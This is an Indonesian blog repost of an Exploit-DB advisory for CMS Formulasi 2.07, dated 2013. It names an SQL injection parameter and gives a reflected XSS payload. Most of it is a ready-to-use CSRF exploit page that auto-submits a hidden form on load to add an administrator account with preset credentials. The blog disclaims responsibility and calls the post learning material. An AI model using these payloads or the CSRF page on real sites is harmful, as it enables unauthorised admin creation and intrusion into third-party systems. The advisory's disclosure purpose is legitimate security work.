========================SQL Injection========================Found onhttp://localhost/formulasi/kelas-siswa.html parameter : kelaspost data : kelas=1{SQL_HERE}========================XSS Vulnerability========================Found Onparameter : tglhttp://localhost/cmsformulasi/index.php?p=tglberita&tgl=<script>alert(123)</script>========================CSRF Vulnerability========================---------------------BOF--------------------------------------------------<html><head><title>Formulasi CRSFT Exploit</title></head><body onload="javascript:fireForms()"><script language="JavaScript">var pauses = new Array( "489","36","27" );function pausecomp(millis){ var date = new Date(); var curDate = null; do { curDate = new Date(); } while(curDate-date < millis);}function fireForms(){ var count = 3; var i=0; for(i=0; i<count; i++) { document.forms[i].submit(); pausecomp(pauses[i]); }} </script><H2>Formulasi CRSFT Exploit</H2><form method="POST" name="form1" action="http://localhost:80/cmsformulasi/adminpanel/aplikasi/admin/admin.php?pilih=admin&untukdi=tambah"><input type="hidden" name="nama_admin" value="usernya"/><input type="hidden" name="username" value="Sarahma12"/><input type="hidden" name="email" value="research@sarahma.co.id"/><input type="hidden" name="level_users" value="1"/><input type="hidden" name="password" value="Password12"/><input type="hidden" name="password_lagi" value="Password12"/></form></body></html>---------------------EOF--------------------------------------------------========================Solution :========================No Update Until This Advisory published ========================Timeline:========================2013-09-27 Provided details vulnerability to vendor2013-10-01 Second NotificaTon Vendor2013-10-04 No Response From Vendor
Sumber EXPLOIT-DB
Sekianlah Postingan Dari GOPRESSXPLOITS Tentang " Exploit CMS Formulasi 2.07 " Semoga Bisa Bermanfaat!.
Anda Sekarang Sedang Membaca Postingan " Exploit CMS Formulasi 2.07 " Dengan URL https://gopressxpoits.blogspot.com/2017/09/exploit-cms-formulasi-207.html
Jika Ada Content Yang Berbau Pantest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

0 Response to "Exploit CMS Formulasi 2.07"
Post a Comment